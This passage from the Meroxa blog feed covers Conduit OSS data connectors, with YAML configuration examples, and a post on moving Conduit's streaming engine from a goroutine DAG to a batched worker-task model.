&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;sqs-source&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
  &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; standalone&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;sqs
  &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;aws.region&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;us-west-2&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;aws.access_key_id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&amp;lt;access_key&gt;&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;aws.secret_access_key&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&amp;lt;secret_key&gt;&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;queue_url&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;https://sqs.us-west-2.amazonaws.com/123456789012/my-queue&quot;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Use Case:&lt;/strong&gt; Queue tasks for downstream services in a microservices architecture.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;4. &lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-elasticsearch&quot;&gt;Elasticsearch Connector (Source)&lt;/a&gt;&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Stream Elasticsearch index data into your pipelines for further analysis.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Configuration Example:&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;es-source&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
  &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; standalone&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;elasticsearch
  &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;elasticsearch.url&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;http://localhost:9200&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;elasticsearch.index&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;my-index&quot;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Use Case:&lt;/strong&gt; Extract logs for storage in a data lake or for further processing.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;5. &lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-dynamodb&quot;&gt;Amazon DynamoDB Connector (Source)&lt;/a&gt;&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Leverage DynamoDB Streams for real-time updates, inserts, and deletes.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Configuration Example:&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;source&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
  &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; standalone&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;dynamodb
  &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;aws.region&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;us-east-1&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;aws.access_key_id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&amp;lt;access_key&gt;&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;aws.secret_access_key&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&amp;lt;secret_key&gt;&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;table_name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;my-table&quot;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Use Case:&lt;/strong&gt; Replicate data from DynamoDB to a relational database for reporting.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Coming Soon: Expanded Capabilities&lt;/strong&gt;&lt;/h3&gt;
&lt;h3&gt;&lt;strong&gt;1. &lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-mysql&quot;&gt;MySQL Connector&lt;/a&gt;&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Stream real-time MySQL changes with Change Data Capture (CDC).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Planned Configuration Example:&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;source&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
  &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; standalone&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;mysql
  &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;mysql.host&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;localhost&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;mysql.user&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;root&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;mysql.password&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;password&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;mysql.database&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;mydb&quot;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Use Case:&lt;/strong&gt; Synchronize MySQL data with cloud data warehouses for real-time analysis.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;2. &lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-sftp&quot;&gt;SFTP Connector&lt;/a&gt;&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Automate file ingestion from SFTP servers into your pipelines.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Planned Configuration Example:&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;source&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
  &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; standalone&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;sftp
  &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;sftp.host&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;sftp.example.com&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;sftp.username&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;user&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;sftp.password&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;password&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;file_pattern&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;*.csv&quot;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Use Case:&lt;/strong&gt; Import nightly batch files for processing in data lakes or warehouses.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Why Developers Love Conduit OSS&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Developer-Centric Design&lt;/strong&gt;: Pre-built connectors save time and effort.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Real-Time Ready&lt;/strong&gt;: Instantly access, stream, and process data.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Scalability&lt;/strong&gt;: Handles large data loads effortlessly.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Flexibility&lt;/strong&gt;: Easily configure sources and destinations for any workflow.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Free and Transparent&lt;/strong&gt;: As an open-source project, Conduit OSS is free to use, modify, and extend.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Get Started Today&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Explore these connectors and start building:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-salesforce&quot;&gt;Salesforce Connector&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-kinesis&quot;&gt;Amazon Kinesis Connector&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-sqs&quot;&gt;Amazon SQS Connector&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-elasticsearch&quot;&gt;Elasticsearch Connector&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-dynamodb&quot;&gt;Amazon DynamoDB Connector&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;Join the Community&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Collaborate with fellow developers and contribute to Conduit OSS on &lt;a href=&quot;https://github.com/conduitio/conduit&quot;&gt;GitHub&lt;/a&gt; or &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord&lt;/a&gt;. Share your feedback and ideas to help us expand the ecosystem with new connectors and features.&lt;/p&gt;
&lt;p&gt;Follow us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;, &lt;a href=&quot;https://www.linkedin.com/company/meroxa&quot;&gt;LinkedIn&lt;/a&gt;, and &lt;a href=&quot;https://youtube.com/@meroxadata143&quot;&gt;YouTube&lt;/a&gt; for more insights and updates!&lt;/p&gt;
&lt;p&gt;Have managed platform needs? &lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;Request a demo&lt;/a&gt; with one of our expert team members today!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Optimizing Conduit - 5x the Throughput]]></title><description><![CDATA[In this blog, we dive into how Conduit transitioned from a flexible but slower architecture to a high-performance streaming engine. We explore the limitations of the old DAG-based design, its impact on ordering guarantees and backpressure, and why switching to a Worker-Task Model drastically improved throughput and efficiency. With real-world performance benchmarks showing a 5x increase in message throughput, this blog is a must-read for developers and data engineers looking to optimize their data pipelines. Learn how Conduit is setting a new standard for real-time data movement and how you can leverage these improvements today! 🚀]]></description><link>https://meroxa.com/blog/optimizing-conduit-5x-the-throughput</link><guid isPermaLink="false">https://meroxa.com/blog/optimizing-conduit-5x-the-throughput</guid><dc:creator><![CDATA[Lovro Mažgon]]></dc:creator><pubDate>Wed, 29 Jan 2025 12:53:00 GMT</pubDate><content:encoded>&lt;p&gt;Conduit has been a public tool for more than 3 years now. When we first started developing Conduit the goals were clear - make a simple-to-use data streaming tool that &quot;just works&quot;. Since we started from scratch, we were following the old advice of &quot;make it work, make it right, make it fast&quot;. We focused on getting the functionality right and picked an architecture that gave us the flexibility the project needed at the start, without focusing as much on performance.&lt;/p&gt;
&lt;p&gt;After years of developing Conduit and operating it on our platform, running thousands of pipelines, we were finally in a place where we could, without a doubt, tick off the first two. Conduit worked correctly as set out at the start and the code was structured in a way that allowed us to easily extend its functionality. Now we found the time to focus on the last part of the advice - &quot;make it fast&quot;.&lt;/p&gt;
&lt;p&gt;After benchmarking and profiling the code we quickly identified the bottlenecks in Conduit&apos;s internal streaming engine. We realized that a new architecture would not only have a great impact on the throughput but also simplify the code. Win-win!&lt;/p&gt;
&lt;h2&gt;The Old Architecture: Strengths and Limitations&lt;/h2&gt;
&lt;p&gt;Let&apos;s first give you an overview of the old architecture, why we chose it in the first place, and what its limitations were.&lt;/p&gt;
&lt;h3&gt;Directed Acyclic Graph (DAG)&lt;/h3&gt;
&lt;p&gt;A data pipeline is, in essence, a directed acyclic graph (DAG), where data moves from one or multiple sources, through one or multiple processors that transform it, towards one or multiple destinations. If we draw such a DAG, we can easily see that each node in the graph receives data from the previous node and passes it on to the next. Conceptually, this perfectly fits the classic way Go encourages developers to write concurrent code, where each goroutine communicates with the others over shared channels.&lt;/p&gt;
&lt;p&gt;Here’s what a DAG could look like in a typical pipeline.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/dag-1.png&quot; alt=&quot;dag-1.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;So this is exactly what we modeled in our code. Every node in the DAG was a separate goroutine responsible for one specific task. The goroutines passed data to each other using unbuffered channels. This software architecture is close to the mental model developers generally use when thinking about a data pipeline. Since we had just started working on the project and didn&apos;t have a clear idea of all the features we wanted a Conduit pipeline to support, this seemed like a straightforward choice. It gave us the flexibility to create different pipelines by connecting nodes together any way we pleased. In the end, we settled on the Conduit pipeline structure we all know and love today: one or multiple sources at the start, one or multiple destinations at the end, and processors that act on the whole pipeline or on a single source or destination.&lt;/p&gt;
&lt;h3&gt;The Good&lt;/h3&gt;
&lt;p&gt;This architecture made it very easy to implement two valuable guarantees: ordering and backpressure. Go channels already guarantee that data written to a channel by one goroutine will be received on the other end in the same order. Since we only ever had a single goroutine writing to a channel and a single goroutine reading from it, the data always flowed through the pipeline and reached the destination in the same order as it was produced by the source.&lt;/p&gt;
&lt;p&gt;We also decided to use unbuffered channels. An unbuffered channel can only be written to if there is another goroutine reading from that channel, otherwise the writer is blocked. This essentially means that any node in the DAG can only send data to the next node if the next one is ready to receive the data. This resulted in backpressure being applied over the whole pipeline. The speed of the slowest destination thus dictated the speed of the whole pipeline, since sources would be blocked trying to send data to the next node if the last node (destination) was busy writing a record.&lt;/p&gt;
&lt;p&gt;The fact that we used nodes also allowed us to easily implement things like parallel processors and the stream inspector. The basic building blocks did not have to change, instead, we simply adjusted the topology of the pipeline by adding additional nodes or connecting them in a different way.&lt;/p&gt;
&lt;h3&gt;The Bad&lt;/h3&gt;
&lt;p&gt;However, there were limitations to the architecture. First, to keep things simple, we made it a rule that nodes only ever operate on a single record. This allowed us to reason about our code and made it easy to ensure all records were accounted for and flushed when a pipeline was stopped. It also meant that batching records was off the table. This was the single biggest bottleneck of the old architecture, since processing records and sending them through channels one by one resulted in lots of handovers between goroutines. When profiling the code, we noticed that the nodes spent most of their time writing to or reading from a channel. Reducing this overhead was a huge opportunity for optimization.&lt;/p&gt;
&lt;p&gt;We realized that managing a huge number of goroutines can get out of hand quickly. Edge cases that can happen in a highly concurrent environment can be non-intuitive for humans to figure out and even harder to test and reproduce consistently. Even though each node was a relatively simple building block by itself, the complexity of orchestrating them was that much higher, especially when a node unexpectedly stopped and things had to be cleaned up.&lt;/p&gt;
&lt;h3&gt;The Ugly&lt;/h3&gt;
&lt;p&gt;Debugging a pipeline composed of dozens of goroutines can suddenly become a day-long task. If you are lucky enough to reproduce the issue, you still have to find the goroutine causing it. Well, &lt;em&gt;if&lt;/em&gt; the cause is a single goroutine, that is. Odds are that the issue is caused by multiple goroutines interacting in a certain way.&lt;/p&gt;
&lt;p&gt;And then there are the two worst things that can happen in a concurrent environment, panics and blocks. A panicking goroutine will bring down the whole application, so recovering and converting panics to an error is crucial. This is easily done if you are in charge of spawning the goroutines, but you need to be consistent or use a library like &lt;a href=&quot;https://github.com/sourcegraph/conc&quot;&gt;conc&lt;/a&gt; to do it for you. Blocking goroutines are harder to prevent. If a bug in the code causes a goroutine to block forever, you can&apos;t force it to stop from another goroutine. And the more goroutines you have, the higher the chances of ending up with an uncaught panic or a blocked goroutine.&lt;/p&gt;
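&lt;p&gt;To illustrate the panic-handling point above, here is a minimal sketch of converting a panic inside a node&apos;s goroutine into an error. The function name and signature are illustrative, not Conduit&apos;s actual internals:&lt;/p&gt;

```go
package main

import "fmt"

// runNode runs a node's work function and converts a panic into an
// error, so a single failing node cannot bring down the whole process.
func runNode(name string, fn func()) (err error) {
	defer func() {
		if r := recover(); r != nil {
			err = fmt.Errorf("node %s panicked: %v", name, r)
		}
	}()
	fn()
	return nil
}

func main() {
	err := runNode("source", func() { panic("boom") })
	fmt.Println(err) // prints "node source panicked: boom"
}
```

&lt;p&gt;Note that a deferred recover only helps with panics; blocked goroutines have no equivalent safety net, which is one more reason fewer goroutines means fewer failure modes.&lt;/p&gt;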
&lt;h2&gt;The New Architecture: Simplicity and Performance&lt;/h2&gt;
&lt;p&gt;Drawing on the lessons from implementing the old architecture, along with our benchmarks and profiles, we decided to implement a new streaming engine designed with simplicity, performance, and maintainability in mind.&lt;/p&gt;
&lt;h3&gt;The Worker-Task Model&lt;/h3&gt;
&lt;p&gt;While the Go community often emphasizes the power of goroutines and channels for concurrent programming, our experience showed that overusing these abstractions introduced overhead that became a bottleneck. Although the node architecture offered flexibility, it didn&apos;t meet our performance needs because the pipeline still operated sequentially, which meant that we didn&apos;t benefit from parallel processing. Each record had to go through multiple nodes, adding latency and reducing throughput due to the overhead of managing these intermediate steps.&lt;/p&gt;
&lt;p&gt;We decided to remove the unnecessary concurrency and embrace a single-threaded approach. This way we gained significant performance improvements while making the code easier to understand and debug. The result is a leaner, faster, and more maintainable engine that retains all the reliability guarantees our users expect from Conduit.&lt;/p&gt;
&lt;p&gt;The new architecture operates with a single-threaded worker per source. Each worker executes a sequence of &lt;strong&gt;tasks&lt;/strong&gt;, representing the stages of the pipeline:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Source tasks&lt;/strong&gt;: Collect a batch of records from the source connector.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Processor tasks&lt;/strong&gt;: Transform, filter, or enrich the batch of records.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Destination tasks&lt;/strong&gt;: Send the processed batch to the destination connector.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Unlike the previous DAG-based approach, where records are moved between nodes via channels, the new model processes batches end-to-end within the same worker. This eliminates the overhead of inter-goroutine communication and reduces context switching.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/worker-task.png&quot; alt=&quot;worker-task.png&quot;&gt;&lt;/p&gt;
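&lt;p&gt;The worker-task model can be sketched roughly like this (the &lt;code class=&quot;language-text&quot;&gt;Task&lt;/code&gt; interface and all names here are illustrative, not Conduit&apos;s actual API):&lt;/p&gt;

```go
package main

import "fmt"

// Task is one stage of the pipeline: source, processor, or destination.
type Task interface {
	Do(batch []string) ([]string, error)
}

// Worker runs all tasks for one source in a single goroutine, passing a
// batch end-to-end through the task chain with no channels in between.
// Backpressure falls out naturally: the next batch is not fetched until
// the current one has finished every task.
type Worker struct {
	tasks []Task
}

func (w *Worker) RunBatch(batch []string) ([]string, error) {
	for _, t := range w.tasks {
		var err error
		if batch, err = t.Do(batch); err != nil {
			return nil, err
		}
	}
	return batch, nil
}

// exclaim stands in for a processor task that transforms every record.
type exclaim struct{}

func (exclaim) Do(batch []string) ([]string, error) {
	out := make([]string, len(batch))
	for i, s := range batch {
		out[i] = s + "!"
	}
	return out, nil
}

func main() {
	w := &Worker{tasks: []Task{exclaim{}}}
	out, _ := w.RunBatch([]string{"a", "b"})
	fmt.Println(out) // [a! b!]
}
```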
&lt;p&gt;Besides cutting down on goroutines, we also introduced the ability to process batches of records, which dramatically decreased the time spent guiding records through the pipeline, since those operations are now executed once per batch instead of once per record. Note that what we call a &quot;batch&quot; in Conduit could be considered a &quot;micro-batch&quot;, since the size is very small and it&apos;s flushed every few seconds. The purpose is simply to reduce the number of operations per record and the number of round-trips to external systems. Users define the maximum batch size and the delay after which a batch is flushed, so the old behavior of streaming every record separately is still achievable and sometimes even preferable (e.g. to reduce latency in a pipeline that doesn&apos;t expect a high load in the first place).&lt;/p&gt;
&lt;h3&gt;Backward Compatibility and Guarantees&lt;/h3&gt;
&lt;p&gt;An important goal of the new architecture was to keep the new engine backward compatible and retain the same guarantees that we provided in the old architecture, specifically the ordering guarantee and backpressure.&lt;/p&gt;
&lt;p&gt;Given that records from a specific source need to reach the destination in the same order as they are produced on the source, we decided to use a single worker per source to not fall into the trap of having to orchestrate the order across multiple workers. This made it trivial to implement backpressure since a worker is only ever processing one batch at a time, so the source is not able to produce another batch until the last one is processed end-to-end.&lt;/p&gt;
&lt;p&gt;However, because we introduced batching, the ordering guarantee was a tougher nut to crack. You have to consider acknowledgments to understand why this was not simple:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Ordered acknowledgments&lt;/strong&gt;: Records must reach the destination in the same order as produced by the source. At the same time, acknowledgments must propagate back to the source in order.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Acknowledgments are done per record&lt;/strong&gt;: Conduit sends acknowledgments back to the source connector for specific records, not for whole batches, as batches can be partially processed.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Records need to be end-to-end processed&lt;/strong&gt;: Only records that reach the end of the pipeline can be successfully acknowledged. &quot;The end of the pipeline&quot; could be the dead-letter-queue (DLQ) or a destination.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To illustrate these challenges, let&apos;s dive deeper with an example.&lt;/p&gt;
&lt;p&gt;Consider a pipeline with 1 source, 1 processor and 1 destination. The records produced by the source are supposed to contain URLs, which the processor uses to fetch more data and enrich the records.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/example1.png&quot; alt=&quot;example1.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;Let&apos;s say the source produces a batch of 5 records and the worker supplies them to the processor. The processor processes all records successfully, except the 3rd record, which contains a malformed URL. Now, what should the worker do in this case to correctly honor the ordering guarantee?&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/example2.png&quot; alt=&quot;example2.png&quot;&gt;&lt;/p&gt;
&lt;h3&gt;Write to DLQ first&lt;/h3&gt;
&lt;p&gt;One idea would be to send the 3rd record to the DLQ right away, remove it from the batch, and send the remaining 4 to the destination. However, if the 3rd record is successfully written to the DLQ while the rest fails to be written to the actual destination, the ordering guarantee is violated.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/example3.png&quot; alt=&quot;example3.png&quot;&gt;&lt;/p&gt;
&lt;h3&gt;Write to the destination first&lt;/h3&gt;
&lt;p&gt;What if we remove the 3rd record from the batch and first send the remaining 4 to the destination before sending the 3rd one to the DLQ? Again, the ordering guarantee can be violated if the 4 records are successfully written to the destination, but the 3rd record fails to be written to the DLQ. In this case, the pipeline would stop, because the 3rd record failed to be written to both the destination and the DLQ. The next time the pipeline is started, it would continue from the last acknowledged record. But since we have already written and acknowledged record 5, the pipeline will continue with record 6 and lose record 3 forever.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/example4.png&quot; alt=&quot;example4.png&quot;&gt;&lt;/p&gt;
&lt;h3&gt;Split batch&lt;/h3&gt;
&lt;p&gt;The only correct thing to do is to split the batch into separate sub-batches:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;The first sub-batch contains records 1 and 2, which are sent to the destination as a single batch. Only once those are processed end-to-end and acknowledged can we continue to the next record.&lt;/li&gt;
&lt;li&gt;The second sub-batch contains only the 3rd record. The record is written to the DLQ, and if successful, it means the record has reached the end of the pipeline and can be acknowledged.&lt;/li&gt;
&lt;li&gt;Now the remaining records 4 and 5 can be sent to the destination as a single batch. Even if this operation fails, the records can safely be written to the DLQ, without violating any ordering guarantees.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/example5.png&quot; alt=&quot;example5.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;The example can get much more convoluted if you imagine multiple processors that fail to process multiple non-consecutive records in a batch. The generic solution we came up with is splitting the batch into sub-batches of consecutive records that were either all successfully processed or all failed. This approach allows us to retain the end-to-end ordering guarantee even in the face of failures.&lt;/p&gt;
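&lt;p&gt;A sketch of that splitting logic (the record shape and names are illustrative, not Conduit&apos;s actual code):&lt;/p&gt;

```go
package main

import "fmt"

// record carries only what the example needs: an ID and whether
// processing failed.
type record struct {
	ID     int
	Failed bool
}

// splitBatch groups a batch into sub-batches of consecutive records that
// share the same processing status, so each sub-batch can be routed as a
// whole, in order, to the destination (success) or the DLQ (failure).
func splitBatch(batch []record) [][]record {
	var subs [][]record
	for _, r := range batch {
		n := len(subs)
		if n == 0 || subs[n-1][0].Failed != r.Failed {
			subs = append(subs, []record{r}) // status changed, start a new sub-batch
		} else {
			subs[n-1] = append(subs[n-1], r)
		}
	}
	return subs
}

func main() {
	// The example above: record 3 failed, the rest succeeded.
	batch := []record{{1, false}, {2, false}, {3, true}, {4, false}, {5, false}}
	for _, sub := range splitBatch(batch) {
		fmt.Println(sub)
	}
	// [{1 false} {2 false}]
	// [{3 true}]
	// [{4 false} {5 false}]
}
```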
&lt;h2&gt;Performance Benchmarks&lt;/h2&gt;
&lt;h3&gt;Benchmark Setup&lt;/h3&gt;
&lt;p&gt;We tested the performance of the new architecture compared to the old architecture in an end-to-end test using the simplest pipeline you can build in Conduit. The source generates records as fast as possible, while the destination logs them with the level &quot;trace&quot;, so the records don&apos;t show up in the log (Conduit by default only displays INFO and higher levels). Both connectors are built-in ones which further minimizes the effect of connectors on the test.&lt;/p&gt;
&lt;p&gt;Here is the pipeline configuration file we used for our tests:&lt;/p&gt;
